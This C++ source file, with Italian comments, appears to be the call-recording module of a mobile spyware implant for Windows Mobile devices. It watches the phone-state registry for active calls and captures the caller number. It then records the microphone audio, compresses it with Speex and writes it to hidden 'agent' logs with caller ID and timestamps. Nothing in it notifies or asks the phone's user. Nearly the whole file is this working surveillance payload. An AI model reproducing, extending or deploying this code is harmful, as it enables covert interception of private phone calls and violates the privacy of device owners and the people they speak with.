#include "Common.h"
#include "Conf.h"
#include "Agents.h"
#include <exception>

#include <mmsystem.h>
#include <winreg.h>
#include "CWaveForm.h"
#include "speex/speex.h"
#include "RecordedCalls.h"

BOOL bLocalCallIsrecording;
DWORD dwLocalCallBuffInCount;
WAVEHDR	tagLocalCallWaveHdr[LOCAL_CALL_COUNT_BUFF];
CWaveformIn *callObj;
WCHAR LocalCallPhoneNumber[PHONE_NUMBER_LEN];

DWORD local_call_buffer_len = LOCAL_CALL_DEF_BUFFER_LEN;
DWORD local_call_compress_factor = LOCAL_CALL_DEF_COMPRESS_FACTOR; 

void SaveEncode(TCHAR *name, BYTE *wave, DWORD total_size)
{
	short *bit_sample;
	void *state;
	float *input;
	BYTE *to_write;
	BYTE *source_ptr;
	BYTE *cbits;
	SpeexBits bits;
	DWORD frame_size = 0;
	DWORD i, nbBytes;	
	DWORD complexity = 1;
	VoiceAdditionalData vad;

	// Crea un nuovo encoder in wide mode
	state = speex_encoder_init(speex_lib_get_mode(SPEEX_MODEID_UWB));
	speex_encoder_ctl(state, SPEEX_SET_QUALITY, &local_call_compress_factor);
	speex_encoder_ctl(state, SPEEX_SET_COMPLEXITY, &complexity);
	speex_bits_init(&bits);
	speex_encoder_ctl(state, SPEEX_GET_FRAME_SIZE, &frame_size);

	if (!frame_size) {
		SPEEX_FREE;
		return;
	}

	// Allochiamo il buffer di output grande quanto quello originale (per sicurezza)
	if (!(to_write = new(std::nothrow) BYTE[frame_size*LOCAL_CALL_SAMPLE_SIZE])) {
		SPEEX_FREE;
		return;
	}
	cbits = to_write + sizeof(DWORD); // Punta al blocco dati, mentre la prima DWORD conterra' la dimensione

	// Allochiamo il buffer di elaborazione
	if (!(input = new(std::nothrow) FLOAT[frame_size])) {
		SAFE_DELETE(to_write);
		SPEEX_FREE;
		return;
	}

	Log *log = new(std::nothrow) Log;

	if(log == NULL) {
		SAFE_DELETE(to_write);
		SAFE_DELETE(input);	
		SPEEX_FREE;
		return;
	}

	unsigned __int64 stop_time = GetTime();
	unsigned __int64 tsize = total_size;

	vad.in_out = CHANNEL_INPUT;
	vad.program_type = VOIP_TYPE_MOBILE;
	vad.stop.dwHighDateTime = (DWORD)((stop_time & 0xffffffff00000000) >> 32);
	vad.stop.dwLowDateTime = (DWORD)(stop_time & 0x00000000ffffffff);
	
	stop_time -= (((tsize / 2) / 8000) * 10000000);
	vad.start.dwHighDateTime = (DWORD)((stop_time & 0xffffffff00000000) >> 32);
	vad.start.dwLowDateTime = (DWORD)(stop_time & 0x00000000ffffffff);

	wcscpy(vad.caller_id, name);

	if(log->CreateLog(LOGTYPE_CALL, (BYTE *)&vad, sizeof(vad)) == FALSE) {
		SAFE_DELETE(to_write);
		SAFE_DELETE(input);
		delete log;
		SPEEX_FREE;
		return;
	}

	// Continua finche' dopo source_ptr non rimane ancora spazio per un frame intero
	for (source_ptr=wave; source_ptr+(frame_size*LOCAL_CALL_SAMPLE_SIZE)<=wave+total_size; source_ptr+=(frame_size*LOCAL_CALL_SAMPLE_SIZE)) {
		// Copiamo i campioni a 16 bit dentro dei float
		bit_sample = (short *)source_ptr;
		for (i=0; i<frame_size; i++)
			input[i] =  bit_sample[i];

		speex_bits_reset(&bits);
		speex_encode(state, input, &bits);
		// Encoda dentro il buffer di output
		nbBytes = speex_bits_write(&bits, (char *)cbits, frame_size*LOCAL_CALL_SAMPLE_SIZE);
		if (nbBytes > (frame_size*LOCAL_CALL_SAMPLE_SIZE))
			continue; // Check paranoico
		// Copia la lunghezza nei primi 4 byte per fare un unica scrittura su file
		memcpy(to_write, &nbBytes, sizeof(DWORD)); 
		log->WriteLog(to_write, nbBytes + sizeof(DWORD));
	}

	log->CloseLog();
	delete log;
	SAFE_DELETE(to_write);
	SAFE_DELETE(input);
	SPEEX_FREE;
}


void CALLBACK LocalCallWaveInProc(HWAVEIN hwi, UINT uMsg, DWORD dwInstance, WAVEHDR *dwParam1, DWORD dwParam2)
{
	if (uMsg == MM_WIM_DATA) {
		if (dwParam1->dwBytesRecorded > 0)
			SaveEncode(LocalCallPhoneNumber, (BYTE *)dwParam1->lpData, dwParam1->dwBytesRecorded);

		if (bLocalCallIsrecording) {
			waveInUnprepareHeader(hwi, dwParam1, sizeof(WAVEHDR));

			dwParam1->dwFlags = 0;
			dwParam1->dwBytesRecorded = 0;
			waveInPrepareHeader(hwi, dwParam1, sizeof(WAVEHDR));
			waveInAddBuffer(hwi, dwParam1, sizeof(WAVEHDR));
		} else {
			dwLocalCallBuffInCount++;	
		}
	}
}


BOOL RecordStop(BOOL is_finished)
{
	FILETIME ft;
	SYSTEMTIME st;
	VoiceAdditionalData vad;

	if (callObj == NULL)
		return FALSE;

	bLocalCallIsrecording = FALSE;
	callObj->Reset();

	// Aspetta che abbia flushato i buffer
	while(dwLocalCallBuffInCount < LOCAL_CALL_COUNT_BUFF)
		Sleep(500);

	// Inserisce i tag di fine chiamata
	if (is_finished) {
		GetSystemTime(&st);
		SystemTimeToFileTime(&st, &ft);

		vad.in_out = CHANNEL_INPUT;
		vad.program_type = VOIP_TYPE_MOBILE;
		vad.stop.dwHighDateTime = ft.dwHighDateTime;
		vad.stop.dwLowDateTime = ft.dwLowDateTime;
		vad.start.dwHighDateTime = ft.dwHighDateTime;
		vad.start.dwLowDateTime = ft.dwLowDateTime;
		wcscpy(vad.caller_id, LocalCallPhoneNumber);

		UINT dummy = 0xFFFFFF;
		Log *log = new(std::nothrow) Log;

		if(log) {
			if(log->CreateLog(LOGTYPE_CALL, (BYTE *)&vad, sizeof(vad)))
				log->WriteLog((BYTE *)&dummy, sizeof(UINT));

			log->CloseLog();
			delete log;
		}
	}

	callObj->Close();
	for (int j=0; j<LOCAL_CALL_COUNT_BUFF; j++) {
		callObj->UnprepareHeader(&(tagLocalCallWaveHdr[j]), sizeof(WAVEHDR));
		SAFE_FREE(tagLocalCallWaveHdr[j].lpData);
	}
	delete callObj;
	callObj = NULL;
	return TRUE;
}


BOOL RecordStart()
{
	WAVEFORMATEX in_pcmWaveFormat;
	CWaveform wave;
	UINT count = CWaveform::InGetNumDevs();

	dwLocalCallBuffInCount = 0;

	for(UINT i = 0; i < count && callObj == NULL; i++) {
		WAVEINCAPS wic;

		CWaveform::InGetDevCaps(i, &wic, sizeof(WAVEINCAPS));
		if (wic.dwFormats & WAVE_FORMAT_1M16) {
			ZeroMemory(&in_pcmWaveFormat, sizeof(WAVEFORMATEX));
			CWaveform::PrepareWaveFormat(&in_pcmWaveFormat, WAVE_FORMAT_PCM, 1, 8000L, 16);
			callObj = wave.InOpen(i, &in_pcmWaveFormat, (DWORD_PTR) LocalCallWaveInProc, 0, CALLBACK_FUNCTION);
		}
	}

	if (callObj == NULL) 
		return FALSE;

	ZeroMemory(tagLocalCallWaveHdr, sizeof(tagLocalCallWaveHdr));
	for (int j=0; j<LOCAL_CALL_COUNT_BUFF; j++) {
		tagLocalCallWaveHdr[j].dwBufferLength = local_call_buffer_len;
		tagLocalCallWaveHdr[j].dwLoops = 1;
		// Alloca i buffer di registrazione e li prepara
		if ( !(tagLocalCallWaveHdr[j].lpData = (char *)new(std::nothrow) CHAR[tagLocalCallWaveHdr[j].dwBufferLength]) )  {
			for (int k=0; k<j; k++) {
				SAFE_DELETE(tagLocalCallWaveHdr[k].lpData);
			}

			callObj->Close();
			delete callObj;
			callObj = NULL;
			return FALSE;
		}
	}

	for (int j=0; j<LOCAL_CALL_COUNT_BUFF; j++) { 
		callObj->PrepareHeader(&(tagLocalCallWaveHdr[j]), sizeof(WAVEHDR));
		callObj->AddBuffer(&(tagLocalCallWaveHdr[j]), sizeof(WAVEHDR));
	}

	bLocalCallIsrecording = TRUE;
	callObj->Start();

	return TRUE;
}


DWORD WINAPI RecordedCalls(LPVOID lpParam) {
	AGENT_COMMON_DATA(AGENT_CALL_LOCAL);

	HKEY hPhoneState;
	DWORD dwType = 0;
	WCHAR szData[PHONE_NUMBER_LEN];
	DWORD cbData = 0;
	BOOL bCallStatus = FALSE, bStop;

	bLocalCallIsrecording = FALSE;
	callObj = NULL;
	ZeroMemory(LocalCallPhoneNumber, sizeof(LocalCallPhoneNumber));

	agents = statusObj->GetAgentsList();

	if(lpParam == NULL || agents == NULL){
		AGENT_STOP_ME;
	}

	// Inizializziamo i parametri di configurazione
	memcpy(&local_call_buffer_len, myData->pParams, sizeof(UINT));
	memcpy(&local_call_compress_factor, ((BYTE *)myData->pParams + sizeof(UINT)), sizeof(UINT));

	AGENT_I_AM_ALIVE;

	if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"System\\State\\Phone", 0, 0, &hPhoneState) != ERROR_SUCCESS) {
		AGENT_STOP_ME;
	}

	while(1) {
		ZeroMemory(szData, sizeof(szData));
		cbData = sizeof(szData);
		LONG status = RegQueryValueEx(hPhoneState, L"Call Start Time", NULL, &dwType, (LPBYTE) &szData, &cbData);

		if (bCallStatus && status != ERROR_SUCCESS) {
			// chiamata chiusa!
			bCallStatus = FALSE;
			RecordStop(TRUE);
			ZeroMemory(LocalCallPhoneNumber, sizeof(LocalCallPhoneNumber));
		} else if (!bCallStatus && status == ERROR_SUCCESS) {
			// chiamata in corso!
			ZeroMemory(szData, sizeof(szData));
			cbData = sizeof(szData)-1;
			RegQueryValueEx(hPhoneState, L"Caller Number", NULL, &dwType, (LPBYTE) &szData, &cbData);
			bCallStatus = TRUE;
			wcscpy(LocalCallPhoneNumber, szData);

			RecordStart();	
		} 

		AGENT_QUERY_STOP(bStop);
		if(bStop) {
			if (bCallStatus) {
				RecordStop(FALSE);
				ZeroMemory(LocalCallPhoneNumber, sizeof(LocalCallPhoneNumber));
			}
			RegCloseKey(hPhoneState);

			AGENT_STOP_ME;
		} else {
			Sleep(1000);
		}
	}

	AGENT_STOP_ME;
	return 0;
}